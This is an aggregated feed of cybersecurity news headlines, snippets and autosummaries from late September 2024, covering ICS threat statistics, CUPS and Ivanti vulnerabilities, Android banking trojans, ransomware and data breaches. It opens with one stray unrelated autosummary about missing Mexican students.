        Autosummary: The protesters waved a banner commemorating the 43 missing student teachers. An initial investigation, under then-President Enrique Peña Nieto, concluded that corrupt municipal police from Iguala and surrounding towns, acting on orders from the local mayor, handed the students over to the Guerreros Unidos drug cartel. Under her theory, the Mexican Army, acting on behalf of drug traffickers, intercepted the shipment, leading to the students' deaths to eliminate any witnesses. "


        Threat landscape for industrial automation systems. Q2 2024

        industry
        2024-09-26 https://ics-cert.kaspersky.com/publications/threat-landscape-for-industrial-automation-systems-q2-2024/
        In the second quarter of 2024, the percentage of ICS computers on which malicious objects were blocked decreased by 0.9 pp from the previous quarter to 23.5%. Compared to the second quarter of 2023, the percentage decreased by 3.3 pp. "

        Autosummary: Q2 in numbers
        Parameter                                                      Q1 2024   Q2 2024   Quarterly change
        Global percentage of attacked ICS computers                    24.40%    23.50%    -0.9 pp
        Percentage of ICS computers on which malicious objects from different categories were blocked:
        Denylisted internet resources                                  6.84%     6.63%     -0.21 pp
        Malicious scripts and phishing pages (JS and HTML)             5.84%     5.69%     -0.15 pp
        Spy Trojans, backdoors and keyloggers                          3.90%     4.08%     0.18 pp
        Malicious documents (MSOffice + PDF)                           1.72%     1.96%     0.24 pp
        Viruses                                                        1.56%     1.54%     -0.02 pp
        Worms                                                          1.51%     1.48%     -0.03 pp
        Miners in the form of executable files for Windows             0.92%     0.89%     -0.03 pp
        Web miners running in browsers                                 0.49%     0.50%     0.01 pp
        This group includes Windows computers that serve one or several of the following purposes:
        - Supervisory control and data acquisition (SCADA) servers
        - Building automation servers
        - Data storage (Historian) servers
        - Data gateways (OPC)
        - Stationary workstations of engineers and operators
        - Mobile workstations of engineers and operators
        - Human machine interface (HMI)
        - Computers used to manage technological and building automation networks
        - Computers of ICS/PLC programmers
        Computers that share statistics with us belong to organizations from various industries.
        Malicious object categories: Malicious objects of various categories, which Kaspersky products block on ICS computers, can be divided into three groups according to their distribution method and purpose: malicious objects used for initial infection, next-stage malware, and self-propagating malware. Malicious objects used for initial infection include dangerous web resources, malicious scripts, and malicious documents.
        Figure: Percentage of ICS computers on which malicious objects were blocked, by month, 2022-2024
        Regionally, the percentage of ICS computers that blocked malicious objects during the quarter ranged from 11.3% in Northern Europe to 30% in Africa.
        Figure: Percentage of ICS computers on which malicious objects were blocked, by quarter, 2022-2024
        The percentage of ICS computers on which malicious objects were blocked in the second quarter of 2024 was highest in May and lowest in June. "


        CISA warns hackers targeting industrial systems with “unsophisticated methods” as claims made of Lebanon water hack

        industry
        2024-09-26 https://www.tripwire.com/state-of-security/cisa-warns-hackers-targeting-industrial-systems-unsophisticated-methods
        The US Cybersecurity and Infrastructure Security Agency (CISA) has warned that hackers continue to be capable of compromising industrial control systems (ICS) and other operational technology (OT) using "unsophisticated methods" - suggesting that much more still needs to be done to secure them properly. Meanwhile, a pro-Israel hacking group claims to have changed chlorine levels at water facilities in Lebanon. Read more in my article on the Tripwire State of Security blog. "

        Autosummary: Industrial control systems manage and regulate processes in the WWS sector such as water filtration, chemical treatment, and pumping stations - ensuring that they operate within safe parameters, maintain the quality of drinking water, and prevent contamination to the environment. "


        Active Directory compromise: Cybersecurity agencies provide guidance

        ciber
        2024-09-26 https://www.helpnetsecurity.com/2024/09/26/active-directory-compromise/

        Active Directory (AD), Microsoft’s on-premises directory service for Windows domain networks, is so widely used for enterprise identity and access management that compromising it has become almost a standard step in cyber intrusions. “Active Directory is susceptible to compromise due to its permissive default settings, its complex relationships, and permissions; support for legacy protocols and a lack of tooling for diagnosing Active Directory security issues,” Five Eyes cybersecurity agencies have clarified in a recently released … More

        The post Active Directory compromise: Cybersecurity agencies provide guidance appeared first on Help Net Security.

        "

        Autosummary: "


        N. Korean Hackers Deploy New KLogEXE and FPSpy Malware in Targeted Attacks

        exploits
        2024-09-26 https://thehackernews.com/2024/09/n-korean-hackers-deploy-new-klogexe-and.html
        Threat actors with ties to North Korea have been observed leveraging two new malware strains dubbed KLogEXE and FPSpy. The activity has been attributed to an adversary tracked as Kimsuky, which is also known as APT43, ARCHIPELAGO, Black Banshee, Emerald Sleet (formerly Thallium), Sparkling Pisces, Springtail, and Velvet Chollima. "These samples enhance Sparkling Pisces' already extensive arsenal "

        Autosummary: "


        EPSS vs. CVSS: What’s the Best Approach to Vulnerability Prioritization?

        exploits
        2024-09-26 https://thehackernews.com/2024/09/epss-vs-cvss-whats-best-approach-to.html
        Many businesses rely on the Common Vulnerability Scoring System (CVSS) to assess the severity of vulnerabilities for prioritization. While these scores provide some insight into the potential impact of a vulnerability, they don’t factor in real-world threat data, such as the likelihood of exploitation. With new vulnerabilities discovered daily, teams don’t have the time - or the budget - to "

        Autosummary: The model works by collecting a wide range of vulnerability information from various sources, such as the National Vulnerability Database (NVD), CISA KEV, and Exploit-DB, along with evidence of exploitation activity. Improving prioritization with exploit data: To improve vulnerability prioritization, organizations should move beyond CVSS scores and consider other factors, such as exploitation activity identified in the wild. For example, if EPSS indicates a high probability of exploitation for a vulnerability with a relatively low CVSS score, security teams might consider prioritizing that vulnerability over others that may have higher CVSS scores but a lower likelihood of exploitability. "


        US sanctions crypto exchanges used by Russian ransomware gangs

        exploits ransomware rusia-ucrania
        2024-09-26 https://www.bleepingcomputer.com/news/security/us-sanctions-crypto-exchanges-used-by-russian-ransomware-gangs/
        The U.S. Treasury Department's Office of Foreign Assets Control (OFAC) has sanctioned PM2BTC and Cryptex, two cryptocurrency exchanges that laundered funds from Russian ransomware gangs and other cybercrime groups. [...] "

        Autosummary: "Cryptex is also associated with over $720 million in transactions to services frequently used by Russia-based ransomware actors and cybercriminals, including fraud shops, mixing services, exchanges lacking KYC programs, and OFAC-designated virtual currency exchange Garantex," the Treasury said. "


        Critical RCE vulnerability found in OpenPLC

        exploits industry
        2024-09-26 https://securityaffairs.com/168953/ics-scada/openplc-critical-flaw.html
        Cisco’s Talos reported critical and high-severity flaws in OpenPLC that could lead to a DoS condition and remote code execution. Cisco’s Talos threat intelligence unit has disclosed details of five newly patched vulnerabilities in OpenPLC, an open-source programmable logic controller. These vulnerabilities can be exploited to trigger a denial-of-service (DoS) condition or execute remote code. OpenPLC […] "

        Autosummary: The remaining DoS flaws discovered by Talos are tracked as CVE-2024-36980, CVE-2024-36981, CVE-2024-39589, and CVE-2024-39590. "


        China-linked APT group Salt Typhoon compromised some U.S. internet service providers (ISPs)

        Telcos
        2024-09-26 https://securityaffairs.com/168941/apt/salt-typhoon-china-linked-threat-actors-breached-us-isp.html
        China-linked threat actors compromised some U.S. internet service providers (ISPs) as part of a cyber espionage campaign code-named Salt Typhoon. China-linked threat actors have breached several U.S. internet service providers in recent months as part of a cyber espionage campaign code-named Salt Typhoon. The state-sponsored hackers aimed at gathering intelligence from the targets or carrying […] "

        Autosummary: “The threat actor was attempting to steal all data stored in the active directory, compromising every single username and password in the organization, along with other personally identifiable information, billing data, call detail records, credentials, email servers, geo-location of users, and more.” Since May 2020, over 200,000 devices, including SOHO routers, NVR/DVR devices, NAS servers, and IP cameras, have been compromised and added to the Raptor Train botnet, making it one of the largest China-linked IoT botnets discovered. In August, Volexity researchers reported that a China-linked APT group, tracked as StormBamboo (aka Evasive Panda, Daggerfly, and StormCloud), successfully compromised an undisclosed internet service provider (ISP) in order to poison DNS responses for target organizations. Macma is a modular backdoor that supports multiple functionalities, including device fingerprinting, executing commands, screen capture, keylogging, audio capture, uploading and downloading files. "


        CUPS flaws enable Linux remote code execution, but there’s a catch

        Linux
        2024-09-26 https://www.bleepingcomputer.com/news/security/cups-flaws-enable-linux-remote-code-execution-but-theres-a-catch/
        Under certain conditions, attackers can chain a set of vulnerabilities in multiple components of the CUPS open-source printing system to execute arbitrary code remotely on vulnerable machines. [...] "

        Autosummary: No patches, but mitigation measures are available. While patches are still in development, Red Hat shared mitigation measures requiring admins to stop the cups-browsed service from running and prevent it from being started on reboot, using the following commands to break the exploit chain:
        sudo systemctl stop cups-browsed
        sudo systemctl disable cups-browsed
        Red Hat users can also use the following command to find out if cups-browsed is running on their systems:
        sudo systemctl status cups-browsed
        If the result displays "Active: inactive (dead)," then the exploit chain is halted, and the system is not vulnerable. "


        New RomCom malware variant "SnipBot" spotted in data theft attacks

        exploits
        2024-09-26 https://www.bleepingcomputer.com/news/security/new-romcom-malware-variant-snipbot-spotted-in-data-theft-attacks/
        A new variant of the RomCom malware called SnipBot, has been used in attacks that pivot on the network to steal data from compromised systems. [...] "

        Autosummary: Doing so triggers a series of redirects across multiple domains under the attacker's control ("fastshare[.]click," "docstorage[.]link," and "publicshare[.]link"), ultimately delivering a malicious executable downloader from file-sharing platforms like "temp[.]sh". "


        Cybersecurity jobs available right now: September 25, 2024

        ciber
        2024-09-25 https://www.helpnetsecurity.com/2024/09/25/cybersecurity-jobs-available-right-now-september-25-2024/

        CISO Guardz | Israel | Hybrid – View job details As a CISO, you will develop and implement security policies and procedures to enhance the security of the company’s IT environment. Develop, implement, and maintain a comprehensive information security strategy to protect company data, production systems, and networks from threats; ensure compliance with relevant security standards, regulations, and best practices (PCI DSS, SOX, ISO 27001, etc). Cloud Security Architect Nuix | Australia | Hybrid – … More

        The post Cybersecurity jobs available right now: September 25, 2024 appeared first on Help Net Security.

        "

        Autosummary: (Senior) Test Engineer Cybersecurity – SDV Hub CARIAD | Germany | On-site – View job details As a (Senior) Test Engineer Cybersecurity – SDV Hub, you will conduct comprehensive security testing, including penetration testing, vulnerability assessments, and ethical hacking, to identify and address potential security risks in automotive systems. Develop, implement, and maintain a comprehensive information security strategy to protect company data, production systems, and networks from threats; ensure compliance with relevant security standards, regulations, and best practices (PCI DSS, SOX, ISO 27001, etc). Cloud Security Architect Nuix | Australia | Hybrid – View job details As a Cloud Security Architect, you will design, build, and secure cloud architecture on AWS and Azure, utilizing tools like Lacework, Mend, and SonarQube for continuous security and compliance. Information Security and Data Protection Manager Taaleem | UAE | On-site – View job details As an Information Security and Data Protection Manager, you will develop and maintain information security policies, standards, procedures, and guidance. "


        Ivanti vTM auth bypass flaw exploited in attacks, CISA warns (CVE-2024-7593)

        exploits
        2024-09-25 https://www.helpnetsecurity.com/2024/09/25/cve-2024-7593-exploited/

        CVE-2024-7593, a critical authentication bypass vulnerability affecting Ivanti Virtual Traffic Manager (vTM) appliances, is actively exploited by attackers. The confirmation comes from the Cybersecurity and Infrastructure Security Agency (CISA), which added the flaw to its Known Exploited Vulnerabilities catalog, thus mandating all US federal civilian executive branch agencies to remediate it by October 15, 2024. About CVE-2024-7593 Ivanti Virtual Traffic Manager is a software-based application delivery controller and load balancing solution. It includes a web-based … More

        The post Ivanti vTM auth bypass flaw exploited in attacks, CISA warns (CVE-2024-7593) appeared first on Help Net Security.

        "

        Autosummary: "


        ManageEngine Analytics Plus 6.0 identifies key inefficiencies in IT operations

        industry
        2024-09-25 https://www.helpnetsecurity.com/2024/09/25/manageengine-analytics-plus-6-0/

        ManageEngine announced a significant upgrade to its flagship IT analytics solution, Analytics Plus. Version 6.0 introduces Spotlight, a contextual recommendations engine powered by AI, designed to identify key inefficiencies in IT operations and suggest corrective strategies. The 2023 State of Analytics Engineering report found that time to business insight is the biggest challenge for nearly 50% of surveyed directors. Spotlight dramatically reduces the time IT managers and CIOs spend analyzing various IT metrics and coming … More

        The post ManageEngine Analytics Plus 6.0 identifies key inefficiencies in IT operations appeared first on Help Net Security.

        "

        Autosummary: Deriving meaningful and context-specific insights is becoming increasingly challenging due to a significant disconnect: the people performing the analysis are skilled at mining data but often lack the IT context, making it difficult to translate findings into actionable business decisions,” said Samantha Hall, service delivery manager, Leathams Ltd., a UK-based food supplying company. In addition to these key features, Analytics Plus version 6.0 includes a range of productive enhancements such as multivariate forecasting, workflow charts, support for distributed processing (on-premises) and more than 10 new integrations with popular IT tools. "


        Transportation Companies Hit by Cyberattacks Using Lumma Stealer and NetSupport Malware

        exploits ciber
        2024-09-25 https://thehackernews.com/2024/09/transportation-companies-hit-by.html
        Transportation and logistics companies in North America are the target of a new phishing campaign that delivers a variety of information stealers and remote access trojans (RATs). The activity cluster, per Proofpoint, makes use of compromised legitimate email accounts belonging to transportation and shipping companies so as to inject malicious content into existing email conversations. As many "

        Autosummary: " The disclosure comes amid the emergence of various stealer malware strains such as Angry Stealer, BLX Stealer (aka XLABB Stealer), Emansrepo Stealer, Gomorrah Stealer, Luxy, Poseidon, PowerShell Keylogger, QWERTY Stealer, Taliban Stealer, X-FILES Stealer, and a CryptBot-related variant dubbed Yet Another Silly Stealer (YASS). "


        CISA Flags Critical Ivanti vTM Vulnerability Amid Active Exploitation Concerns

        exploits
        2024-09-25 https://thehackernews.com/2024/09/cisa-flags-critical-ivanti-vtm.html
        The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Tuesday added a critical security flaw impacting Ivanti Virtual Traffic Manager (vTM) to its Known Exploited Vulnerabilities (KEV) catalog, based on evidence of active exploitation. The vulnerability in question is CVE-2024-7593 (CVSS score: 9.8), which could be exploited by a remote unauthenticated attacker to bypass the "

        Autosummary: "


        U.S. CISA adds Ivanti Virtual Traffic Manager flaw to its Known Exploited Vulnerabilities catalog

        exploits
        2024-09-25 https://securityaffairs.com/168881/hacking/u-s-cisa-adds-ivanti-virtual-traffic-manager-flaw-known-exploited-vulnerabilities-catalog.html
        U.S. Cybersecurity and Infrastructure Security Agency (CISA) adds Ivanti Virtual Traffic Manager vulnerability to its Known Exploited Vulnerabilities catalog. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added Ivanti Virtual Traffic Manager authentication bypass vulnerability CVE-2024-7593 (CVSS score of 9.8) to its Known Exploited Vulnerabilities (KEV) catalog. In mid-August 2024, Ivanti addressed the vulnerability CVE-2024-7593 that impacts […] "

        Autosummary: U.S. CISA adds Ivanti Virtual Traffic Manager flaw to its Known Exploited Vulnerabilities catalog (Pierluigi Paganini, September 25, 2024). "


        Arkansas City water treatment facility switched to manual operations following a cyberattack

        financial government ciber
        2024-09-25 https://securityaffairs.com/168871/hacking/arkansas-city-water-treatment-facility-cyberattack.html
        Arkansas City, a small city in Cowley County, Kansas, was forced to switch its water treatment facility to manual operations due to a cyberattack. Arkansas City, Kansas, had to switch its water treatment facility to manual operations over the weekend due to a cyberattack that was detected on Sunday. As of the 2020 census, Arkansas City has […] "

        Autosummary: "


        New Android banking trojan Octo2 targets European banks

        financial exploits
        2024-09-25 https://securityaffairs.com/168857/malware/octo2-android-banking-trojan.html
        A new version of the Android banking trojan Octo, called Octo2, supports improved features that allow it to take over infected devices. ThreatFabric researchers discovered a new version of the Android banking trojan Octo, called Octo2, that supports more advanced remote action capabilities needed for Device Takeover attacks. The new malware has already targeted users in European […] "

        Autosummary: Over the years, Octo malware campaigns targeted regions worldwide, including Europe, the USA, Canada, the Middle East, Singapore, and Australia. "


        Romance scams costlier than ever: 10 percent of victims lose $10,000 or more

        financial
        2024-09-25 https://www.malwarebytes.com/blog/news/2024/09/romance-scams-costlier-than-ever-10-percent-of-victims-lose-10000-or-more
        A Malwarebytes survey has found 66 percent of people were targeted by a romance scam, with 10 percent of victims losing $10,000 or more. "

        Autosummary: If you’ve been impacted by a romance scam, pig butchering, or crypto investment fraud, you can report the crime to the Internet Crimes Complaint Center (IC3), which is run by the FBI, or the FTC on its reporting and resources page. Demographics of romance scams The majority of survey respondents were subject to romance scam advances within the last year, with 37 percent saying it happened within the last six months, and an additional 15 percent saying it happened between six months and one year ago. Unfortunately, that leaves 26 percent engaging with romance scammers for more than two weeks, with 12 percent spending several months talking to pretend paramours, and 5 percent in a faux relationship for one year or more.In 2023, romance scam victims—not counting those who reported crypto investment fraud—lost a median of $2,000 per person, the highest reported losses for any form of imposter scam, according to the FTC. For a full breakdown of survey results, including demographics, scammer tactics, and financial and emotional impacts, read below. "


        Malwarebytes Personal Data Remover: A new way to help scrub personal data online

        exploits
        2024-09-25 https://www.malwarebytes.com/blog/personal/2024/09/malwarebytes-personal-data-remover-a-new-way-to-help-scrub-personal-data-online
        Malwarebytes is simplifying your security and privacy with the release of our new Personal Data Remover. "

        Autosummary: Instead, it’s traded through a bustling network of “data brokers” that work tirelessly to collect and sell people’s names, addresses, phone numbers, bankruptcy records, salaries, marital statuses, and more. "


        PoC for critical SolarWinds Web Help Desk vulnerability released (CVE-2024-28987)

        exploits
        2024-09-25 https://www.helpnetsecurity.com/2024/09/25/cve-2024-28987-poc/

        Details about and proof-of-concept (PoC) exploit code for CVE-2024-28987, a recently patched SolarWinds Web Help Desk (WHD) vulnerability that could be exploited by unauthenticated attackers to remotely read and modify all help desk ticket details, are now public. “When assessing the exposure of our own clients, we found that organizations typically revealed sensitive process information for IT procedures such as user onboarding, password resets, and accessing shared resources. While this vulnerability does not lead to … More



        Malwarebytes Personal Data Remover protects user privacy

        exploits
        2024-09-25 https://www.helpnetsecurity.com/2024/09/25/malwarebytes-personal-data-remover/

        Malwarebytes introduced its latest consumer product, Personal Data Remover, designed to protect user privacy by assisting users with the deletion of personal information from data broker databases and people search sites. This new solution offers regular monitoring to ensure individuals’ data remains private, providing a robust defense against data misuse that can lead to stalking, spam, and identity theft. Today, data brokers have nearly 1,500 data points for every consumer, ranging from addresses and phone … More


        Autosummary: Key features of Personal Data Remover: Malwarebytes Personal Data Remover scans a network of data broker databases and people search sites, assisting users in removing their personal details, and offering ongoing monitoring to maintain their online privacy, automating up to 318 hours of work a consumer would have to undertake themselves.


        Cybersecurity Researchers Warn of New Rust-Based Splinter Post-Exploitation Tool

        exploits ciber
        2024-09-25 https://thehackernews.com/2024/09/cybersecurity-researchers-warn-of-new.html
        Cybersecurity researchers have flagged the discovery of a new post-exploitation red team tool called Splinter in the wild. Palo Alto Networks Unit 42 shared its findings after it discovered the program on several customers' systems. "It has a standard set of features commonly found in penetration testing tools and its developer created it using the Rust programming language," Unit 42's Dominik

        Autosummary: "As new APIs are added to Windows, new ideas for injection techniques are appearing," security researcher Aleksandra "Hasherezade" Doniec said.


        Expert Tips on How to Spot a Phishing Link

        financial
        2024-09-25 https://thehackernews.com/2024/09/expert-tips-on-how-to-spot-phishing-link.html
        Phishing attacks are becoming more advanced and harder to detect, but there are still telltale signs that can help you spot them before it's too late. See these key indicators that security experts use to identify phishing links: 1. Check Suspicious URLs. Phishing URLs are often long, confusing, or filled with random characters. Attackers use these to disguise the link's true destination

        Autosummary: Complex URL with redirects: In this case, after the initial "Google" in the URL, you see 2 other instances of "Google," which is a clear sign of a redirection attempt and misuse of the platform. Example: Suspicious page title along with broken Microsoft favicon analyzed inside ANY.RUN. In this Safebrowsing session, you'll notice how the page title and favicon don't align with what you would expect from a legitimate Microsoft Office login page. Example: Interface elements mimicking Adobe PDF Viewer. In this Safebrowsing session, attackers mimicked Adobe PDF Viewer, embedding its password input form. Example: Cloudflare verification abuse observed in ANY.RUN's Safebrowsing session. In this analysis session, attackers use Cloudflare verification as a deceptive layer in their phishing scheme to add legitimacy and obscure their malicious intent.


        Storm Helene strengthens as it heads to Mexico and Florida

        latam
        2024-09-25 https://www.bbc.com/news/articles/czd13mezz7mo
        The tropical storm is forecast to strengthen into a category-three hurricane by Thursday.



        CISA: Hackers target industrial systems using “unsophisticated methods”

        industry
        2024-09-25 https://www.bleepingcomputer.com/news/security/cisa-hackers-target-industrial-systems-using-unsophisticated-methods/
        CISA warned today of threat actors trying to breach critical infrastructure networks by targeting Internet-exposed industrial devices using "unsophisticated" methods like brute force attacks and default credentials. [...]



        New variant of Necro Trojan infected more than 11 million devices

        exploits
        2024-09-25 https://securityaffairs.com/168898/malware/new-necro-trojan-apps-11m-downloads.html
        Experts warn of the Necro Trojan found in Google Play; threat actors are spreading it through fake versions of legitimate Android apps. Researchers from Kaspersky discovered a new version of the Necro Trojan in multiple apps uploaded to the Google Play store. The malware was hidden in popular applications and game mods. Kaspersky researchers first spotted […]

        Autosummary: It can perform various malicious actions, including displaying ads in invisible windows, downloading and executing DEX files, installing applications, opening links in hidden WebView windows, executing JavaScript, and creating tunnels through the victim’s device. (Pierluigi Paganini, September 25, 2024.)


        Future-proofing cybersecurity: Why talent development is key

        ciber
        2024-09-24 https://www.helpnetsecurity.com/2024/09/24/jon-france-isc2-cybersecurity-workforce/

        In this Help Net Security interview, Jon France, CISO at ISC2, discusses cybersecurity workforce growth. He outlines organizations’ challenges, such as budget constraints and limited entry-level opportunities. France also points to the urgent need to upskill current employees and adopt inclusive hiring practices to tackle the growing skills gap in the industry. The ISC2 report indicates that the growth of the cybersecurity workforce could be more stable. What are the main reasons behind this slowdown, … More


        Autosummary: The most critical gaps identified include skills in AI (34%), cloud security (30%), zero trust (27%), digital forensics (25%), and application security (24%). In Europe, three major causes of skills shortages have been identified: difficulty finding candidates with the right skills (33%), limited budgets (29%), and IT departments introducing new technology without the expertise to secure it (29%). Companies that succeed in recruiting and retaining diverse talent invest in diversity, equity, and inclusion (DEI) initiatives, set measurable diversity goals, and expand recruitment efforts beyond traditional job portals. Organizations must also focus on expanding entry-level opportunities, upskilling current employees, and building more diverse pipelines of talent to bridge the widening skills gap.


        How cyber compliance helps minimize the risk of ransomware infections

        exploits ransomware
        2024-09-24 https://www.helpnetsecurity.com/2024/09/24/cyber-compliance-minimize-risk/

        Over the past decade, ransomware has been cemented as one of the top cybersecurity threats. In 2023 alone, the FBI received 2,385 ransomware complaints, resulting in over $34 million in losses. To help businesses combat ransomware and other threats, various regulatory bodies have developed cyber compliance frameworks to standardize best security practices across industries. While following governmental and industry-focused guidelines doesn’t necessarily ensure a stronger cyber posture, these frameworks do provide useful starting points as … More


        Autosummary: The platform comes with features designed to simplify the entire compliance lifecycle, with tools to support selecting frameworks, creating custom frameworks based on risk analyses, collecting evidence from integrated platforms, identifying gaps, executing user access reviews, implementing new controls, generating reports and continuously monitoring compliance efforts. Cyber governance, risk, and compliance (GRC) platform Cypago provides a centralized approach to managing compliance by automating many of the repetitive and time-consuming tasks involved in tracking, reporting, and maintaining adherence to various standards. By following the standards and practices outlined in these frameworks, organizations can establish structured and industry-standard cybersecurity programs that are capable of minimizing vulnerabilities, adapting to evolving ransomware trends, and responding to security incidents.


        MFA bypass becomes a critical security issue as ransomware tactics advance

        exploits ransomware industry
        2024-09-24 https://www.helpnetsecurity.com/2024/09/24/ransomware-session-hijacking-tactics/

        Ransomware is seen as the biggest cybersecurity threat across every industry, with 75% of organizations affected by ransomware more than once in the past 12 months – a jump from 61% in 2023, according to SpyCloud. Session hijacking surges as major ransomware threat: Traditional tools and solutions like antivirus and MFA are not infallible. For organizations affected by ransomware in the past year, MFA bypass via session hijacking is seen as the greatest emerging threat … More


        Autosummary: Insurance: 6.3x more likely to experience a ransomware attack; Healthcare: 2.1x more likely to experience a ransomware attack. CIOs, CISOs, and other IT security executives (91%) are almost twice as confident as their security practitioner counterparts (54%) in their organization’s ability to prevent a full-blown ransomware attack – outlining an alarming disconnect between key decision makers and front-line teams on their preparedness for this costly threat. Rise of infostealer malware and digital identity exposure: Cybercriminals have pivoted to next-generation tactics, using information-stealing malware (or “infostealers”) to siphon digital identity data, authentication details, and session cookies from infected users and selling this information to ransomware operators – leaving virtually every respondent (99.8%) concerned about this trend.


        MoneyGram confirms a cyberattack is behind dayslong outage

        financial ciber
        2024-09-24 https://www.bleepingcomputer.com/news/security/moneygram-confirms-a-cyberattack-is-behind-dayslong-outage/
        Money transfer giant MoneyGram has confirmed it suffered a cyberattack after dealing with system outages and customer complaints about lack of service since Friday. [...]

        Autosummary: "Upon detection, we immediately launched an investigation and took protective steps to address it, including proactively taking systems offline, which impacted network connectivity."


        New Octo Android malware version impersonates NordVPN, Google Chrome

        exploits
        2024-09-24 https://www.bleepingcomputer.com/news/security/new-octo-android-malware-version-impersonates-nordvpn-google-chrome/
        A new version of the Octo Android malware, named "Octo2," has been seen spreading across Europe under the guise of NordVPN, Google Chrome, and an app called Europe Enterprise. [...]

        Autosummary: Among other things, Octo v1 supported keylogging, on-device navigation, SMS and push notification interception, device screen locking, sound muting, arbitrary app launches, and using infected devices for SMS distribution.


        Citing security fears, Ukraine bans Telegram on government and military devices

        government
        2024-09-24 https://www.bitdefender.com/blog/hotforsecurity/citing-security-fears-ukraine-bans-telegram-on-government-and-military-devices/
        The government of Ukraine imposed a ban on the Telegram messaging app being used on official devices belonging to government officials, military staff, and critical infrastructure workers, citing security fears. Read more in my article on the Hot for Security blog.



        NICE Actimize Fraud Investigation combats fraud and financial crime

        financial
        2024-09-24 https://www.helpnetsecurity.com/2024/09/24/nice-actimize-fraud-investigation/

        NICE Actimize launched its AI-powered Fraud Investigations solution, which facilitates end-to-end fraud management capabilities from detection to investigations. Explicitly designed to enable fraud investigations post detection, the new solution helps financial institutions save both time and money with its automated workflow and robust fraud-specific case management capabilities. Advanced generative AI embedded in the solution also provides automation that helps financial institutions quickly address customer concerns and consistently meet regulatory timelines. The NICE Actimize Fraud Investigation solution … More



        U.S. Proposes Ban on Connected Vehicles Using Chinese and Russian Tech

        rusia-ucrania
        2024-09-24 https://thehackernews.com/2024/09/us-proposes-ban-on-connected-vehicles.html
        The U.S. Department of Commerce (DoC) said it's proposing a ban on the import or sale of connected vehicles that integrate software and hardware made by foreign adversaries, particularly that of the People's Republic of China (PRC) and Russia. "The proposed rule focuses on hardware and software integrated into the Vehicle Connectivity System (VCS) and software integrated into the Automated



        Discover Latest Ransomware Tactics and Zero Trust Strategies in This Expert Webinar

        exploits ransomware industry
        2024-09-24 https://thehackernews.com/2024/09/discover-latest-ransomware-tactics-and.html
        Ransomware is no longer just a threat; it's an entire industry. Cybercriminals are growing more sophisticated, and their tactics are evolving rapidly. This persistent danger is a major concern for business leaders. But there's good news: you don't have to be defenseless. What if you could gain a strategic edge? Join our exclusive webinar, "Unpacking the 2024 Ransomware Landscape: Insights and

        Autosummary: In this informative session, you will: Go Beyond the Headlines: Explore the details behind recent ransomware incidents and uncover how attackers infiltrate, encrypt, and extort their victims.


        New Octo2 Android Banking Trojan Emerges with Device Takeover Capabilities

        financial exploits
        2024-09-24 https://thehackernews.com/2024/09/new-octo2-android-banking-trojan.html
        Cybersecurity researchers have discovered a new version of an Android banking trojan called Octo that comes with improved capabilities to conduct device takeover (DTO) and perform fraudulent transactions. The new version has been codenamed Octo2 by the malware author, Dutch security firm ThreatFabric said in a report shared with The Hacker News, adding campaigns distributing the malware have

        Autosummary: The new version has been codenamed Octo2 by the malware author, Dutch security firm ThreatFabric said in a report shared with The Hacker News, adding campaigns distributing the malware have been spotted in European countries like Italy, Poland, Moldova, and Hungary.


        Did Israel infiltrate Lebanese telecoms networks?

        Telcos
        2024-09-24 https://securityaffairs.com/168817/intelligence/did-israel-infiltrate-lebanese-telecoms-networks.html
        Israel has been sending text messages, recordings, and hacking radio networks to warn Lebanese citizens to evacuate certain areas in the country, likely due to an imminent full-scale strike. Following these warnings, massive bombings in southern […]

        Autosummary: Pierluigi Paganini, September 24, 2024: Israel has been sending text messages, recordings, and hacking radio networks to warn Lebanese citizens to evacuate certain areas.


        U.S. govt agency CMS says data breach impacted 3.1 million people

        financial
        2024-09-24 https://www.bleepingcomputer.com/news/healthcare/us-govt-agency-cms-says-data-breach-impacted-31-million-people/
        The Centers for Medicare & Medicaid Services (CMS) federal agency announced earlier this month that health and personal information of more than three million health plan beneficiaries was exposed in the MOVEit attacks Cl0p ransomware conducted last year. [...]



        Infostealer malware bypasses Chrome’s new cookie-theft defenses

        exploits
        2024-09-24 https://www.bleepingcomputer.com/news/security/infostealer-malware-bypasses-chromes-new-cookie-theft-defenses/
        Infostealer malware developers released updates claiming to bypass Google Chrome's recently introduced App-Bound Encryption feature, which protects sensitive data such as cookies. [...]



        Critical Ivanti vTM auth bypass bug now exploited in attacks

        exploits
        2024-09-24 https://www.bleepingcomputer.com/news/security/critical-ivanti-vtm-auth-bypass-bug-now-exploited-in-attacks/
        CISA has tagged another critical Ivanti security vulnerability, which can let threat actors create rogue admin users on vulnerable Virtual Traffic Manager (vTM) appliances, as actively exploited in attacks. [...]



        Hackers deploy AI-written malware in targeted attacks

        exploits
        2024-09-24 https://www.bleepingcomputer.com/news/security/hackers-deploy-ai-written-malware-in-targeted-attacks/
        While cybercriminals have used generative AI technology to create convincing emails, government agencies have warned about the potential abuse of AI tools to create malicious software, despite the safeguards and restrictions that vendors implemented. [...]

        Autosummary: (Figure: AES encryption implementation in JavaScript. Source: HP.) After brute-forcing the password, the researchers analyzed the code and found "that the attacker had neatly commented the entire code," something that rarely happens with human-developed code, because threat actors want to hide how the malware works.


        Warnings after new Valencia ransomware group strikes businesses and leaks data

        exploits ransomware
        2024-09-24 https://www.tripwire.com/state-of-security/warnings-after-new-valencia-ransomware-group-strikes-businesses-and-leaks-data
        A new ransomware operation has started to leak information it claims has been stolen from organisations it has compromised around the world. In recent days Valencia Ransomware has posted on its dark web leak site's so-called "Wall of shame" links to gigabytes of downloadable information that has seemingly been exfiltrated from a Californian municipality, a pharmaceutical firm, and a paper manufacturer. Read more in my article on the Tripwire State of Security blog.

        Autosummary: The alleged victims include the City of Pleasanton in California (where the attacker claims to have stolen 283GB of sensitive information), Malaysian pharmaceutical firm Duopharma Biotech (25.7GB), Indian paper manufacturer Satia (7.1GB), and Bangladeshi drugs maker Globe Pharmaceuticals (200MB).


        Transportation, logistics companies targeted with lures impersonating fleet management software

        industry
        2024-09-24 https://www.helpnetsecurity.com/2024/09/24/transportation-logistics-malware-attacks/

        Financially motivated threat actors are targeting North American companies in the transportation and logistics sector with tailored lures, info-stealing malware, and a clever new trick. How the attack unfolds: According to Proofpoint threat researchers, the attackers start by compromising email accounts of workers in transportation and shipping companies and then responding to existing email conversations within the account’s inbox. The emails are usually short, and initially urged recipients to follow a link to / download … More


        Autosummary: In these limited campaigns, the delivered malware included info-stealers (Lumma Stealer, StealC, ArechClient2, DanaBot) and remote control software (NetSupport).


        Necro Android Malware Found in Popular Camera and Browser Apps on Play Store

        exploits
